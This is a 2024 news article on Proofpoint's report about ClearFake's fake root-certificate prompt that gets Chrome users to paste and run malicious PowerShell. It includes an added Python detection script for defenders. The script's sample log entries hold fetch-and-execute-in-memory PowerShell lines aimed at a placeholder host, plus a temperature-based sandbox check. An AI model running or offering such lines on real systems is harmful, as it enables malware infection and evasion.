Proofpoint uncovers social engineering technique

Proofpoint Inc.

By Dylan Bushell-Embling
Monday, 24 June, 2024


Proofpoint has uncovered a new social engineering technique that attempts to coerce victims into copying and pasting malicious PowerShell scripts, infecting their own computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed since at least 1 March, used by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.

The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check for virtual environments and sandboxes; if none are found, it downloads a fourth PowerShell script that downloads a file named, extracts the content and searches it for any .exe files.
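The chain described above (DNS flush, clipboard wipe, decoy message, remote script executed in memory, then a temperature-based sandbox check) lends itself to a script-block-log heuristic. The following Python is an added example for defenders, not Proofpoint's or the article's code: it runs a few constructed PowerShell script-block log entries through simple indicator patterns and rates each entry by how much of the described chain it exhibits. The command spellings used for each step (`ipconfig /flushdns`, `Set-Clipboard`, `iex` with a download cmdlet, the `MSAcpi_ThermalZoneTemperature` WMI class) are assumptions about how such behaviour is commonly written, not text quoted from the advisory, and the sample entries are made up.

```python
import re

# One pattern per behaviour the advisory describes. The command spellings are
# assumptions about typical phrasing, not strings taken from the campaign.
INDICATORS = {
    "flush_dns": re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clear_clipboard": re.compile(r"Set-Clipboard|\|\s*clip(\.exe)?\b|Clipboard\]::Clear", re.I),
    "decoy_message": re.compile(r"Write-Host|MessageBox\]::Show", re.I),
    "remote_download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I
    ),
    "in_memory_exec": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "sandbox_temp_check": re.compile(r"MSAcpi_ThermalZoneTemperature", re.I),
}

# Constructed script-block log entries (PowerShell Event ID 4104 style); not real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign administrative one-liner
    "Get-Service | Where-Object {$_.Status -eq 'Running'} | Sort-Object Name",
    # 1: mimics the described first stage: flush DNS, wipe clipboard, decoy text, fetch-and-run in memory
    "ipconfig /flushdns; Set-Clipboard -Value ' '; Write-Host 'The root certificate has been installed'; "
    "iex ((New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1'))",
    # 2: benign on its own, a DNS flush is routine troubleshooting
    "ipconfig /flushdns",
    # 3: temperature query used as a sandbox/VM check, nothing downloaded
    "$t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace root/wmi; if (-not $t) { exit }",
    # 4: remote fetch executed in memory with no supporting behaviour
    "iex (iwr 'http://stage.example.invalid/c.ps1')",
]


def match_indicators(block):
    """Return the sorted names of every indicator pattern found in one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(block))


def verdict(indicators):
    """Rate a block: the core of the chain is fetching remote content and running it
    without touching disk; the other behaviours raise confidence when seen alongside it."""
    hits = set(indicators)
    staged = {"remote_download", "in_memory_exec"} <= hits
    support = hits & {"flush_dns", "clear_clipboard", "decoy_message", "sandbox_temp_check"}
    if staged and support:
        return "high"
    if staged or "sandbox_temp_check" in hits:
        return "medium"
    return "low"


def scan(blocks):
    """Classify every script block and return one result record per block."""
    results = []
    for i, block in enumerate(blocks):
        ind = match_indicators(block)
        results.append({"index": i, "verdict": verdict(ind), "indicators": ind})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {r['index']}: {r['verdict']:6s} {', '.join(r['indicators']) or '-'}")
```

A single DNS flush or a single `Write-Host` is routine, which is why the scoring only escalates when the download-and-execute pair appears together with one of the supporting behaviours; the temperature query alone is rated medium because it has few legitimate uses in an interactive session.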

This method was then used to download payloads including cryptocurrency miners, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”

